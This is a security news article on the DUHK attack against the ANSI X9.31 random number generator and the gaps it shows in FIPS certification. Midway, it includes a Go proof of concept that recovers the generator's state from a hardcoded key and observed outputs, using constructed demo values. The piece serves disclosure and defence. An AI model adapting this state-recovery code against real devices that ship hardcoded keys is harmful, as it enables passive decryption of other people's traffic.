DUHK Attack Exposes Gaps in FIPS Certification

The DUHK Attack leverages a 20-year-old random number generator flaw to recover private keys. More pertinent, researchers said, is that the flaw exposes gaps in the FIPS certification process.

Despite the obligatory logo and clever name, this week’s assault on crypto, the so-called DUHK attack (Don’t Use Hardcoded Keys), isn’t likely to be part of many threat models.

Though the attack can be used to passively decrypt VPN and encrypted browser traffic, it relies on a host of implementation errors in admittedly ancient security appliances to trigger a vulnerability known for two decades in a pseudorandom number generator.

And while the issue in the ANSI X9.17/X9.31 PRNG should be patched, in particular on old versions of certain firewall appliances and VPN gateways, there is a much larger issue: the PRNG design has been built into a number of crypto standards since it was published in 1985, and it remained on the FIPS 140-1 and 140-2 lists of algorithms approved for use on government systems until January 2016.

The researchers said in a paper published Monday, “Practical state recovery attacks against legacy RNG implementations,” that a dozen FIPS 140-2 certified products, listed below, contain a static hardcoded key in their source code, rendering them vulnerable to this attack. The researchers developed an attack against Fortinet FortiGate VPN gateways running FortiOS version 4 and were able to recover the private encryption key after a few seconds of computation time.

“We measured the prevalence of this vulnerability on the visible Internet using active scans and find that we are able to recover the random number generator state for 21% of HTTPS hosts serving a default Fortinet product certificate, and 97% of hosts with metadata identifying FortiOSv4,” the researchers wrote. “We successfully demonstrate full private key recovery in the wild against a subset of these hosts that accept IPsec connections.”

Heninger told Threatpost that such an attack would be on the radar of nation states.

“It’s a passive decryption ability in an ancient version of Fortigate (Fortinet) products. If there are sysadmins who are worried about whether they need to patch everything if their company; if they have a vulnerable version of Fortigate, they should apply the patch, otherwise I wouldn’t worry too much because this isn’t something that is going to be exploited by script kiddies,” she said.

The ANSI X9.17/X9.31 PRNG was deprecated by NIST in 2011 and outright banned in January 2016. The core weakness, however, has been known since a 1998 paper by crypto pioneers John Kelsey, Bruce Schneier, David Wagner and Chris Hall. That paper pointed out that if an attacker ever learned the static key and a small amount of raw output, the security offered by the ANSI PRNG would be useless. As Green wrote in a blog post accompanying the release of the DUHK paper, those experts (Kelsey is still with NIST) thought in 1998 that it was unlikely an attacker could learn the static key.

“If an attacker were to obtain K somehow, and then was able to learn only a single 16-byte raw output block (Ri) from a working PRG, she could do the following: (1) guess the timestamp T, (2) work backwards (decrypting using K) in order to recover the corresponding state value V, and now (3) run the generator forwards or backwards (with guesses for T) to obtain every previous and subsequent output of the generator,” Green wrote. “Thus, if an application uses the ANSI generator to produce something like a random nonce (something that is typically sent in a protocol in clear text), and also uses the generator to produce secret keys, this means an attacker could potentially recover those secret keys and completely break the protocol.”
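The three steps Green describes are easy to follow on a working generator. The following Go program is an added example for this article, not code from the DUHK paper, Green's post or any affected product: it implements the X9.31 construction with AES-128 as the block cipher, uses a constructed hardcoded key, a constructed secret seed and a counter standing in for the wall-clock timestamp (so the "guess T" step has a small search window), and shows that once K is known, two output blocks seen in the clear are enough to recover both the state that preceded them and every output that follows. The names `X931`, `Recover`, `Outputs` and the demo values are all assumptions of this example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"fmt"
)

// Block is one 128-bit PRNG block (AES-128 is the block cipher here).
type Block [16]byte

// X931 is a minimal ANSI X9.31 generator. K is the seed key (hardcoded in
// the affected products); V is the secret state that is supposed to stay unknown.
type X931 struct {
	blk cipher.Block
	V   Block
}

func NewX931(key []byte, seed Block) (*X931, error) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return &X931{blk: blk, V: seed}, nil
}

func xor(a, b Block) (out Block) {
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return
}

func enc(blk cipher.Block, in Block) (out Block) { blk.Encrypt(out[:], in[:]); return }
func dec(blk cipher.Block, in Block) (out Block) { blk.Decrypt(out[:], in[:]); return }

// TsBlock turns a 64-bit counter into the timestamp block T. A real
// implementation feeds in the clock; a counter stands in for it here
// (constructed for the example) so the attacker's guess has a known window.
func TsBlock(t uint64) (T Block) {
	binary.BigEndian.PutUint64(T[8:], t)
	return
}

// Next is one X9.31 step:  I = E_K(T);  R = E_K(I xor V);  V' = E_K(R xor I).
func (g *X931) Next(T Block) Block {
	I := enc(g.blk, T)
	R := enc(g.blk, xor(I, g.V))
	g.V = enc(g.blk, xor(R, I))
	return R
}

// Recover carries out the three quoted steps. Given K, two consecutive
// observed outputs r1, r2 (think: nonces sent in the clear) and a window of
// candidate timestamps, it (1) guesses T1, (2) works backwards to the state
// V0 that preceded r1, and (3) runs forwards, guessing T2, until the
// candidate state reproduces r2. It returns V0, the state after r2 (from
// which all later outputs follow), and the timestamps that matched.
func Recover(key []byte, r1, r2 Block, tLo, tHi uint64) (v0, vAfter Block, t1, t2 uint64, ok bool) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return
	}
	for t1 = tLo; t1 <= tHi; t1++ {
		I1 := enc(blk, TsBlock(t1))
		V1 := enc(blk, xor(r1, I1)) // candidate state after r1
		for t2 = t1; t2 <= tHi; t2++ {
			I2 := enc(blk, TsBlock(t2))
			if enc(blk, xor(I2, V1)) != r2 {
				continue // this (T1, T2) pair does not reproduce r2
			}
			v0 = xor(dec(blk, r1), I1)     // step 2: decrypt backwards to the state before r1
			vAfter = enc(blk, xor(r2, I2)) // state after r2
			return v0, vAfter, t1, t2, true
		}
	}
	return
}

// Demo values, all constructed for this example.
var (
	DemoKey   = []byte("hardcoded-key-16") // 16-byte K, playing the hardcoded key
	DemoSeed  = Block{0xde, 0xad, 0xbe, 0xef, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16}
	DemoTimes = []uint64{1000, 1003, 1007}
)

// Outputs runs a fresh generator over the given timestamps and returns its outputs.
func Outputs(key []byte, seed Block, times []uint64) ([]Block, error) {
	g, err := NewX931(key, seed)
	if err != nil {
		return nil, err
	}
	var out []Block
	for _, t := range times {
		out = append(out, g.Next(TsBlock(t)))
	}
	return out, nil
}

func main() {
	rs, _ := Outputs(DemoKey, DemoSeed, DemoTimes)
	v0, vAfter, t1, t2, ok := Recover(DemoKey, rs[0], rs[1], 990, 1010)
	fmt.Println("recovered:", ok, "T1 =", t1, "T2 =", t2, "V0 matches seed:", v0 == DemoSeed)
	// With the state after r2 in hand, the never-transmitted third output is predictable.
	g, _ := NewX931(DemoKey, vAfter)
	fmt.Printf("predicted r3 matches: %v (r3 = %x)\n", g.Next(TsBlock(1007)) == rs[2], rs[2])
}
```

The point for defenders is in `Recover`: nothing in it is expensive or clever, and the only secret it needs is K. A generator whose key ships in the firmware therefore offers no protection for any value it produced, including session keys derived from the same stream; the mitigation is the one the article names, retiring the X9.31 design rather than trying to hide K better.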

Heninger questions why the FIPS certification process failed to protect against this two-decades-old attack and why the dozen products identified in the paper were able to pass the same certification process.

“The thing we’re interested in is the broader question of how can we make the certification process more effective to keep these things from happening,” she said. “Why are people still using these ancient algorithms that are much worse than modern random number generator designs decades after they should have been retired?”

Heninger said she hopes that officials who set policy for crypto usage at the government level would pay attention to this research and take steps to retire old algorithms and encourage researchers to examine old standards for similar gaps in security.

“To protect against this type of thing, we need to vet implementations more carefully and take a fine-toothed comb to all of the random number generator algorithms out there,” Heninger said. “From a policy perspective, how do you push the entire community away from vulnerable implementations?”
